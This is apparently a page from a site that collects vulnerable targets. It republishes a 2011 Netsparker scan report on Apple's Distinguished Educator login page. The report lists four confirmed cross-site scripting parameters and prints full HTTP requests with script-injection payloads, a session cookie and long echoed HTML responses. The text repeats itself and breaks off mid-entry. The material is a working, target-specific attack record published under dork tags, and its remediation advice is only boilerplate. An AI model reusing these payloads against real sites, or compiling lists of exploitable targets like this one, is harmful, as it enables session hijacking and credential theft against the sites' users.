XSS, Cross Site Scripting in ade.apple.com, CWE-79, CAPEC-86, DORK, GHDB


XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

Netsparker - Scan Report Summary
TARGET URL
http://ade.apple.com/ade/login.php
SCAN DATE
7/15/2011 1:15:21 PM
REPORT DATE
7/15/2011 1:55:27 PM
SCAN DURATION
00:23:33

Total Requests

Average Speed

req/sec.
13
identified
7
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
31 %
LOW
54 %
INFORMATION
15 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
/ade/apppage.php Cookie Not Marked As HttpOnly Yes
/ade/group_discussions.php Internal Server Error Yes
/ade/images/ Forbidden Resource Yes
E-mail Address Disclosure No
/ade/login Apache MultiViews Enabled No
/ade/login.php nsextt GET Cross-site Scripting Yes
id GET Cross-site Scripting Yes
app_tab_id GET Cross-site Scripting Yes
return_url GET Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

4 TOTAL
IMPORTANT
CONFIRMED
4
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ade/login.php

/ade/login.php CONFIRMED

http://ade.apple.com/ade/login.php?return_url=http%3A%2F%2Fade.apple.com%2Fade%2Fuser_apps_canvas.ph..

Parameters

Parameter Type Value
return_url GET http://ade.apple.com/ade/user_apps_canvas.php?id=$id1&app_tab_id=$id2&nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0003C1)%3C%2Fscript%3E
nsextt GET "><script>alert(9)</script>

Request

GET /ade/login.php?return_url=http%3A%2F%2Fade.apple.com%2Fade%2Fuser_apps_canvas.php%3Fid%3D%24id1%26app_tab_id%3D%24id2%26nsextt%3D%2500%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%280x0003C1%29%253C%252Fscript%253E&nsextt=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://ade.apple.com/ade/user_apps_canvas.php?id=$id1&app_tab_id=$id2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 15 Jul 2011 18:21:44 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Language: en
Set-Cookie: SEP_Forum_before_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:21:46 GMT; path=/,SEP_Forum_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:21:46 GMT; path=/
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
MS-Author-Via: DAV
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
<title>Apple Distinguished Educator Community - Account Login</title>
<base href='http://ade.apple.com/ade/' />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=1025" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<meta name="description" content="Welcome to the Apple Distinguished Educators (ADE) online community. Membership in this site is for ADE members only.<br><br>If you already have an account, please log-in below." />
<meta name="keywords" content="iTunes, Podcast Producer, Mac OS X, Education, Pedagogy, Software" />
<meta name="copyright" content="Apple Inc. - 2011" />
<meta name="author" content="Apple Inc." />
<meta name="Distribution" content="Global" />
<meta name="Rating" content="General" />
<meta name="Robots" content="INDEX,FOLLOW" />
<meta name="Revisit-after" content="1 Day" />
<link rel="apple-touch-icon" href="images/ade_webclip_icon.png">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script>jqcc=jQuery.noConflict(true);</script>

<link rel="stylesheet" href="./templates/styles_global.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles.css" title="stylesheet" type="text/css" />

<script type="text/javascript" src="./include/js/mootools12-min.js"></script>
<script type="text/javascript" src="./include/js/mootools12-more.js"></script>

<script type="text/javascript" src="./include/js/core-min.js"></script>


<script type="text/javascript">
<!--
var SocialEngine = new SocialEngineAPI.Base();

// Core
SocialEngine.Core = new SocialEngineAPI.Core();
SocialEngine.Core.ImportSettings({"setting_url":false,"setting_username":true});
SocialEngine.Core.ImportPlugins(["apps","userpages","article","blog","group","sep_group_integration","forum","gmap","album","geo","poll","epayment","business","businessarticle","businessgroup","businessblog","scheduler","radcodes","plugin_controls"]);
SocialEngine.RegisterModule(SocialEngine.Core);

// URL
SocialEngine.URL = new SocialEngineAPI.URL();
SocialEngine.URL.ImportURLBase('http://ade.apple.com/ade/');
SocialEngine.URL.ImportURLInfo({"albums":{"url_file":"albums","url_regular":"albums.php?user=$user","url_subdirectory":"$user\/albums\/"},"album":{"url_file":"album","url_regular":"album.php?user=$user&album_id=$id1","url_subdirectory":"$user\/albums\/$id1"},"album_file":{"url_file":"album_file","url_regular":"album_file.php?user=$user&album_id=$id1&media_id=$id2","url_subdirectory":"$user\/albums\/$id1\/$id2"},"blog":{"url_file":"blog","url_regular":"blog.php?user=$user","url_subdirectory":"$user\/blog\/"},"blog_entry":{"url_file":"blog_entry","url_regular":"blog.php?user=$user&blogentry_id=$id1","url_subdirectory":"$user\/blog\/$id1\/"},"blog_trackback":{"url_file":"blog_trackback","url_regular":"blog_ajax.php?task=trackback&user=$user&blogentry_id=$id1","url_subdirectory":"$user\/trackback\/$id1\/"},"articles":{"url_file":"articles","url_regular":"articles.php?user=$user","url_subdirectory":"$user\/articles\/"},"article":{"url_file":"article","url_regular":"article.php?article_id=$id1","url_subdirectory":"article\/$id1\/$id2"},"group":{"url_file":"group","url_regular":"group.php?group_id=$id1","url_subdirectory":"group\/$id1\/"},"group_media":{"url_file":"group_media","url_regular":"group_album_file.php?group_id=$id1&groupmedia_id=$id2","url_subdirectory":"group\/$id1\/album\/$id2\/"},"group_discussion":{"url_file":"group_discussion","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2","url_subdirectory":"group\/$id1\/discussion\/$id2\/"},"group_discussion_post":{"url_file":"group_discussion_post","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2&grouppost_id=$id3","url_subdirectory":"group\/$id1\/discussion\/$id2\/$id3\/"},"app_canvas":{"url_file":"app_canvas","url_regular":"user_apps_canvas.php?id=$id1&app_tab_id=$id2","url_subdirectory":"user_apps_canvas.php?id=$id1&app_tab_id=$id2"},"app_page":{"url_file":"app_page","url_regular":"apppage.php?id=$id1","url_subdirectory":"apppage.php?id=$id1"},"app":{"url_file":"app","url_regular":"app.php?id=$id1","url_subdirectory":"application\/$id1\/"},"userpage":{"url_file":"userpage","url_regular":"userpage.php?page_id=$id1","url_subdirectory":"userpage.php?page_id=$id1"},"business":{"url_file":"business","url_regular":"business.php?business_id=$id1","url_subdirectory":"business\/$id1\/$user\/"},"business_media":{"url_file":"business_media","url_regular":"business_album_file.php?business_id=$id1&businessmedia_id=$id2","url_subdirectory":"business\/$id1\/album\/$id2\/"},"business_category":{"url_file":"business_category","url_regular":"browse_businesses.php?businesscat_id=$id1","url_subdirectory":"businesses\/category\/$id1\/$user\/"},"business_tag":{"url_file":"business_tag","url_regular":"browse_businesses.php?tag=$id1","url_subdirectory":"businesses\/tag\/$id1\/"},"business_neighborhood":{"url_file":"business_neighborhood","url_regular":"browse_businesses.php?neighborhood=$id1","url_subdirectory":"businesses\/neighborhood\/$id1\/"},"business_country":{"url_file":"business_country","url_regular":"browse_businesses.php?type=location&country=$id1","url_subdirectory":"businesses\/location\/$id1\/"},"business_province":{"url_file":"business_province","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2","url_subdirectory":"businesses\/location\/$id1\/$id2\/"},"business_city":{"url_file":"business_city","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2&city=$id3","url_subdirectory":"businesses\/location\/$id1\/$id2\/$id3\/"},"polls":{"url_file":"polls","url_regular":"polls.php?user=$user","url_subdirectory":"$user\/polls\/"},"poll":{"url_file":"poll","url_regular":"poll.php?user=$user&poll_id=$id1","url_subdirectory":"$user\/polls\/$id1\/"},"profile":{"url_regular":"profile.php?user=$user","url_subdirectory":"$user\/"}});
SocialEngine.RegisterModule(SocialEngine.URL);

// Language
SocialEngine.Language = new SocialEngineAPI.Language();
SocialEngine.RegisterModule(SocialEngine.Language);

// User - Viewer
SocialEngine.Viewer = new SocialEngineAPI.User();
SocialEngine.Viewer.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Viewer);

// User - Owner
SocialEngine.Owner = new SocialEngineAPI.User();
SocialEngine.Owner.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Owner);

// Back
SELanguage = SocialEngine.Language;
//-->
</script>


<script type="text/javascript">
<!--
// ADD TIP FUNCTION
window.addEvent('load', function()
{
var Tips1 = new Tips($$('.Tips1'));
});
//-->
</script>



<link rel="stylesheet" href="./templates/styles_apps.css?315:1" title="stylesheet" type="text/css">
<!--[if lte IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->
<!--[if lt IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie6.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->

<script type="text/javascript" src="./include/js/semods.js?315:1"></script>
<script type="text/javascript" src="./include/js/semods_apps.js?315:1"></script>

<script type="text/javascript" src="./include/js/smoothboxEx.js?315:1"></script>

<script type="text/javascript" src="./include/js/moofacebox/moofacebox.js?315:1"></script>
<link rel="stylesheet" href="./include/js/moofacebox/moofacebox.css?315:1" title="stylesheet" type="text/css">



<!--[if lt IE 7]>
<script defer type="text/javascript" src="./include/js/pngfix.js"></script>
<![endif]-->

<link rel="stylesheet" href="./templates/styles_userpages.css" title="stylesheet" type="text/css">
<link rel="stylesheet" href="./templates/styles_article.css" title="stylesheet" type="text/css">
<script type="text/javascript" src="./include/fckeditor/fckeditor.js"></script>
<script type="text/javascript" src="./include/js/showhide.js"></script>

<link rel="stylesheet" href="./templates/styles_sep_group_integration.css" title="stylesheet" type="text/css" /><link rel="stylesheet" href="./templates/forum/forum_styles.css" title="stylesheet" type="text/css" />



<script type="text/javascript" src="./include/forum/fckeditor/fckeditor.js"></script>


<link rel="stylesheet" href="./templates/styles_gmap.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles_business.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessarticle.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessgroup.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessblog.css" title="stylesheet" type="text/css" />

<link rel="stylesheet" href="./templates/styles_radcodes.css" title="stylesheet" type="text/css" />
<script type="text/javascript" src="./include/js/radcodes.js"></script>
<link rel="stylesheet" href="./templates/styles_epayment.css" title="stylesheet" type="text/css" />


<style type='text/css'></style>


<script type="text/javascript" src="./promos/promos.js"></script>
<link rel="stylesheet" href="./promos/promos.css" type="text/css" charset="utf-8">




<script type="text/javascript">

// Fade in/out an element by id.
function fade_element(id, method, the_duration) {
var e = document.getElementById(id);
if (the_duration == null){
the_duration = 500;
}
if(method == 'toggle'){
// Requires this CSS: #account_tools{opacity:0;display:block;visibility:hidden;}
if(e.style.opacity == 1){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}else{
e.set('tween',{duration : the_duration}).fade([0,1]);
e.stop();
}
}
if(method == 'out'){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}
}

</script>

</head>
<body>
<iframe id='ajaxframe' name='ajaxframe' style='display: none;' src='javascript:false;'></iframe>

<!-- END header_global.tpl -->

<!-- START header.tpl -->
<div id="overview">
<div id="smoothbox_container"></div>


<div id="productheader">
<div id="logotype">
<a href="user_home.php">
<img id="logotype" src="./images/ade_logotype.png" alt="Apple Distinguished Educator Community" width="300" height="35" />
</a>
</div>

</div>








<div id="main">

<div id="content">





<div style='padding-top:20px;margin-bottom:20px;padding-left:30px;padding-right:30px;'>
<!-- END header.tpl -->


<div id="hero" style='margin: -20px 0 0 -30px; overflow: hidden;'>
<img src='./images/login_hero.jpg' style='width: 980px; height: 270px; margin-top: 5px;' />
</div>


<div id="login_text">
<p>The <a href='http://www.apple.com/education/apple-distinguished-educator/'>Apple Distinguished Educator (ADE) program</a> is a relationship program focused on educational excellence and leadership. ADEs are members of a select group of K-12 and Higher Education professionals possessing an identified expertise in educational technology leadership. This group of over 1,500 educators spans the globe with membership in the USA, Asia, Australia, Canada, Europe, Japan, Mexico and New Zealand.</p>

<h3>ADE Member Roles</h3>
<p>Members of the ADE community fulfill four primary roles in their interaction with Apple:</p>

<h4>Advocates</h4>
<p>ADEs are passionate advocates of the potential of Apple technologies and they provide expert assistance and best practices to educators and policy makers. ADEs are frequent presenters at local, state, national and international educational conferences.</p>

<h4>Advisors</h4>
<p>ADEs provide valuable input to Apple on the realities of integrating instructional technology into learning environments.</p>

<h4>Authors</h4>
<p>ADEs publish authentic work to share with peers such as teaching and leadership best practices, exemplary lesson ideas, and a range of content items that showcase Apple products and technologies for the advancement of education.</p>

<h4>Ambassadors</h4>
<p>ADEs are innovators in building community and capacity for teaching and learning in a global context. Through online projects and collaboration tools, they empower each other to expand the walls of the classroom and bring global experiences to classrooms everywhere.</p>

<!--iframe src='http://education.apple.com/ade_apply/' id="apply"></iframe>-->

<h3>Interested in becoming an ADE?</h3>
<p>For more information on applying to the Apple Distinguished Educator Program, visit the <a href='http://ade.apple.com/apply/'>Class of 2011 Application Page</a>.</p>

</div>

<div class="right" style='padding: 20px; width: 210px; float: right; background: #f0f0f0; -webkit-border-radius: 5px; border-radius: 5px; -moz-border-radius: 5px;'>
<form action='login.php' method='POST' name='login' id='login'>
<h3>Login for ADE Program Members Only</h3>

<label>Email</label>
<input type='text' class='text' name='email' id='email' value='' size='30' maxlength='70'>

<label style='margin-top: 1em; display: block;'>Password</label>
<input type='password' class='text' name='password' id='password' size='30' maxlength='50'>


<br />
<br />
<input type='submit' class='button' value='Login' />&nbsp;
<input type='checkbox' class='checkbox' name='persistent' i..
- /ade/login.php

/ade/login.php CONFIRMED

http://ade.apple.com/ade/login.php?return_url=http%3A%2F%2Fade.apple.com%2Fade%2Fuser_apps_canvas.ph..

Parameters

Parameter Type Value
return_url GET http://ade.apple.com/ade/user_apps_canvas.php?id=$id1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00041A)%3C%2Fscript%3E&app_tab_id=$id2
id GET '><script>alert(9)</script>

Request

GET /ade/login.php?return_url=http%3A%2F%2Fade.apple.com%2Fade%2Fuser_apps_canvas.php%3Fid%3D%24id1%2500%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%280x00041A%29%253C%252Fscript%253E%26app_tab_id%3D%24id2&id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://ade.apple.com/ade/user_apps_canvas.php?id=$id1&app_tab_id=$id2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 15 Jul 2011 18:22:55 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Language: en
Set-Cookie: SEP_Forum_before_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:22:58 GMT; path=/,SEP_Forum_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:22:58 GMT; path=/
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
MS-Author-Via: DAV
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
<title>Apple Distinguished Educator Community - Account Login</title>
<base href='http://ade.apple.com/ade/' />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=1025" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<meta name="description" content="Welcome to the Apple Distinguished Educators (ADE) online community. Membership in this site is for ADE members only.<br><br>If you already have an account, please log-in below." />
<meta name="keywords" content="iTunes, Podcast Producer, Mac OS X, Education, Pedagogy, Software" />
<meta name="copyright" content="Apple Inc. - 2011" />
<meta name="author" content="Apple Inc." />
<meta name="Distribution" content="Global" />
<meta name="Rating" content="General" />
<meta name="Robots" content="INDEX,FOLLOW" />
<meta name="Revisit-after" content="1 Day" />
<link rel="apple-touch-icon" href="images/ade_webclip_icon.png">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script>jqcc=jQuery.noConflict(true);</script>

<link rel="stylesheet" href="./templates/styles_global.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles.css" title="stylesheet" type="text/css" />

<script type="text/javascript" src="./include/js/mootools12-min.js"></script>
<script type="text/javascript" src="./include/js/mootools12-more.js"></script>

<script type="text/javascript" src="./include/js/core-min.js"></script>


<script type="text/javascript">
<!--
var SocialEngine = new SocialEngineAPI.Base();

// Core
SocialEngine.Core = new SocialEngineAPI.Core();
SocialEngine.Core.ImportSettings({"setting_url":false,"setting_username":true});
SocialEngine.Core.ImportPlugins(["apps","userpages","article","blog","group","sep_group_integration","forum","gmap","album","geo","poll","epayment","business","businessarticle","businessgroup","businessblog","scheduler","radcodes","plugin_controls"]);
SocialEngine.RegisterModule(SocialEngine.Core);

// URL
SocialEngine.URL = new SocialEngineAPI.URL();
SocialEngine.URL.ImportURLBase('http://ade.apple.com/ade/');
SocialEngine.URL.ImportURLInfo({"albums":{"url_file":"albums","url_regular":"albums.php?user=$user","url_subdirectory":"$user\/albums\/"},"album":{"url_file":"album","url_regular":"album.php?user=$user&album_id=$id1","url_subdirectory":"$user\/albums\/$id1"},"album_file":{"url_file":"album_file","url_regular":"album_file.php?user=$user&album_id=$id1&media_id=$id2","url_subdirectory":"$user\/albums\/$id1\/$id2"},"blog":{"url_file":"blog","url_regular":"blog.php?user=$user","url_subdirectory":"$user\/blog\/"},"blog_entry":{"url_file":"blog_entry","url_regular":"blog.php?user=$user&blogentry_id=$id1","url_subdirectory":"$user\/blog\/$id1\/"},"blog_trackback":{"url_file":"blog_trackback","url_regular":"blog_ajax.php?task=trackback&user=$user&blogentry_id=$id1","url_subdirectory":"$user\/trackback\/$id1\/"},"articles":{"url_file":"articles","url_regular":"articles.php?user=$user","url_subdirectory":"$user\/articles\/"},"article":{"url_file":"article","url_regular":"article.php?article_id=$id1","url_subdirectory":"article\/$id1\/$id2"},"group":{"url_file":"group","url_regular":"group.php?group_id=$id1","url_subdirectory":"group\/$id1\/"},"group_media":{"url_file":"group_media","url_regular":"group_album_file.php?group_id=$id1&groupmedia_id=$id2","url_subdirectory":"group\/$id1\/album\/$id2\/"},"group_discussion":{"url_file":"group_discussion","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2","url_subdirectory":"group\/$id1\/discussion\/$id2\/"},"group_discussion_post":{"url_file":"group_discussion_post","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2&grouppost_id=$id3","url_subdirectory":"group\/$id1\/discussion\/$id2\/$id3\/"},"app_canvas":{"url_file":"app_canvas","url_regular":"user_apps_canvas.php?id=$id1&app_tab_id=$id2","url_subdirectory":"user_apps_canvas.php?id=$id1&app_tab_id=$id2"},"app_page":{"url_file":"app_page","url_regular":"apppage.php?id=$id1","url_subdirectory":"apppage.php?id=$id1"},"app":{"url_file":"app","url_regular":"app.php?id=$id1","url_subdirectory":"application\/$id1\/"},"userpage":{"url_file":"userpage","url_regular":"userpage.php?page_id=$id1","url_subdirectory":"userpage.php?page_id=$id1"},"business":{"url_file":"business","url_regular":"business.php?business_id=$id1","url_subdirectory":"business\/$id1\/$user\/"},"business_media":{"url_file":"business_media","url_regular":"business_album_file.php?business_id=$id1&businessmedia_id=$id2","url_subdirectory":"business\/$id1\/album\/$id2\/"},"business_category":{"url_file":"business_category","url_regular":"browse_businesses.php?businesscat_id=$id1","url_subdirectory":"businesses\/category\/$id1\/$user\/"},"business_tag":{"url_file":"business_tag","url_regular":"browse_businesses.php?tag=$id1","url_subdirectory":"businesses\/tag\/$id1\/"},"business_neighborhood":{"url_file":"business_neighborhood","url_regular":"browse_businesses.php?neighborhood=$id1","url_subdirectory":"businesses\/neighborhood\/$id1\/"},"business_country":{"url_file":"business_country","url_regular":"browse_businesses.php?type=location&country=$id1","url_subdirectory":"businesses\/location\/$id1\/"},"business_province":{"url_file":"business_province","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2","url_subdirectory":"businesses\/location\/$id1\/$id2\/"},"business_city":{"url_file":"business_city","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2&city=$id3","url_subdirectory":"businesses\/location\/$id1\/$id2\/$id3\/"},"polls":{"url_file":"polls","url_regular":"polls.php?user=$user","url_subdirectory":"$user\/polls\/"},"poll":{"url_file":"poll","url_regular":"poll.php?user=$user&poll_id=$id1","url_subdirectory":"$user\/polls\/$id1\/"},"profile":{"url_regular":"profile.php?user=$user","url_subdirectory":"$user\/"}});
SocialEngine.RegisterModule(SocialEngine.URL);

// Language
SocialEngine.Language = new SocialEngineAPI.Language();
SocialEngine.RegisterModule(SocialEngine.Language);

// User - Viewer
SocialEngine.Viewer = new SocialEngineAPI.User();
SocialEngine.Viewer.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Viewer);

// User - Owner
SocialEngine.Owner = new SocialEngineAPI.User();
SocialEngine.Owner.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Owner);

// Back
SELanguage = SocialEngine.Language;
//-->
</script>


<script type="text/javascript">
<!--
// ADD TIP FUNCTION
window.addEvent('load', function()
{
var Tips1 = new Tips($$('.Tips1'));
});
//-->
</script>



<link rel="stylesheet" href="./templates/styles_apps.css?315:1" title="stylesheet" type="text/css">
<!--[if lte IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->
<!--[if lt IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie6.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->

<script type="text/javascript" src="./include/js/semods.js?315:1"></script>
<script type="text/javascript" src="./include/js/semods_apps.js?315:1"></script>

<script type="text/javascript" src="./include/js/smoothboxEx.js?315:1"></script>

<script type="text/javascript" src="./include/js/moofacebox/moofacebox.js?315:1"></script>
<link rel="stylesheet" href="./include/js/moofacebox/moofacebox.css?315:1" title="stylesheet" type="text/css">



<!--[if lt IE 7]>
<script defer type="text/javascript" src="./include/js/pngfix.js"></script>
<![endif]-->

<link rel="stylesheet" href="./templates/styles_userpages.css" title="stylesheet" type="text/css">
<link rel="stylesheet" href="./templates/styles_article.css" title="stylesheet" type="text/css">
<script type="text/javascript" src="./include/fckeditor/fckeditor.js"></script>
<script type="text/javascript" src="./include/js/showhide.js"></script>

<link rel="stylesheet" href="./templates/styles_sep_group_integration.css" title="stylesheet" type="text/css" /><link rel="stylesheet" href="./templates/forum/forum_styles.css" title="stylesheet" type="text/css" />



<script type="text/javascript" src="./include/forum/fckeditor/fckeditor.js"></script>


<link rel="stylesheet" href="./templates/styles_gmap.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles_business.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessarticle.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessgroup.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessblog.css" title="stylesheet" type="text/css" />

<link rel="stylesheet" href="./templates/styles_radcodes.css" title="stylesheet" type="text/css" />
<script type="text/javascript" src="./include/js/radcodes.js"></script>
<link rel="stylesheet" href="./templates/styles_epayment.css" title="stylesheet" type="text/css" />


<style type='text/css'></style>


<script type="text/javascript" src="./promos/promos.js"></script>
<link rel="stylesheet" href="./promos/promos.css" type="text/css" charset="utf-8">




<script type="text/javascript">

// Fade in/out an element by id.
function fade_element(id, method, the_duration) {
var e = document.getElementById(id);
if (the_duration == null){
the_duration = 500;
}
if(method == 'toggle'){
// Requires this CSS: #account_tools{opacity:0;display:block;visibility:hidden;}
if(e.style.opacity == 1){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}else{
e.set('tween',{duration : the_duration}).fade([0,1]);
e.stop();
}
}
if(method == 'out'){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}
}

</script>

</head>
<body>
<iframe id='ajaxframe' name='ajaxframe' style='display: none;' src='javascript:false;'></iframe>

<!-- END header_global.tpl -->

<!-- START header.tpl -->
<div id="overview">
<div id="smoothbox_container"></div>


<div id="productheader">
<div id="logotype">
<a href="user_home.php">
<img id="logotype" src="./images/ade_logotype.png" alt="Apple Distinguished Educator Community" width="300" height="35" />
</a>
</div>

</div>








<div id="main">

<div id="content">





<div style='padding-top:20px;margin-bottom:20px;padding-left:30px;padding-right:30px;'>
<!-- END header.tpl -->


<div id="hero" style='margin: -20px 0 0 -30px; overflow: hidden;'>
<img src='./images/login_hero.jpg' style='width: 980px; height: 270px; margin-top: 5px;' />
</div>


<div id="login_text">
<p>The <a href='http://www.apple.com/education/apple-distinguished-educator/'>Apple Distinguished Educator (ADE) program</a> is a relationship program focused on educational excellence and leadership. ADEs are members of a select group of K-12 and Higher Education professionals possessing an identified expertise in educational technology leadership. This group of over 1,500 educators spans the globe with membership in the USA, Asia, Australia, Canada, Europe, Japan, Mexico and New Zealand.</p>

<h3>ADE Member Roles</h3>
<p>Members of the ADE community fulfill four primary roles in their interaction with Apple:</p>

<h4>Advocates</h4>
<p>ADEs are passionate advocates of the potential of Apple technologies and they provide expert assistance and best practices to educators and policy makers. ADEs are frequent presenters at local, state, national and international educational conferences.</p>

<h4>Advisors</h4>
<p>ADEs provide valuable input to Apple on the realities of integrating instructional technology into learning environments.</p>

<h4>Authors</h4>
<p>ADEs publish authentic work to share with peers such as teaching and leadership best practices, exemplary lesson ideas, and a range of content items that showcase Apple products and technologies for the advancement of education.</p>

<h4>Ambassadors</h4>
<p>ADEs are innovators in building community and capacity for teaching and learning in a global context. Through online projects and collaboration tools, they empower each other to expand the walls of the classroom and bring global experiences to classrooms everywhere.</p>

<!--iframe src='http://education.apple.com/ade_apply/' id="apply"></iframe>-->

<h3>Interested in becoming an ADE?</h3>
<p>For more information on applying to the Apple Distinguished Educator Program, visit the <a href='http://ade.apple.com/apply/'>Class of 2011 Application Page</a>.</p>

</div>

<div class="right" style='padding: 20px; width: 210px; float: right; background: #f0f0f0; -webkit-border-radius: 5px; border-radius: 5px; -moz-border-radius: 5px;'>
<form action='login.php' method='POST' name='login' id='login'>
<h3>Login for ADE Program Members Only</h3>

<label>Email</label>
<input type='text' class='text' name='email' id='email' value='' size='30' maxlength='70'>

<label style='margin-top: 1em; display: block;'>Password</label>
<input type='password' class='text' name='password' id='password' size='30' maxlength='50'>


<br />
<br />
<input type='submit' class='button' value='Login' />&nbsp;
<input type='checkbox' class='checkbox' name='persistent' i..
- /ade/login.php

/ade/login.php CONFIRMED

http://ade.apple.com/ade/login.php?return_url=http%3A%2F%2Fade.apple.com%2Fade%2Fuser_apps_canvas.ph..

Parameters

Parameter Type Value
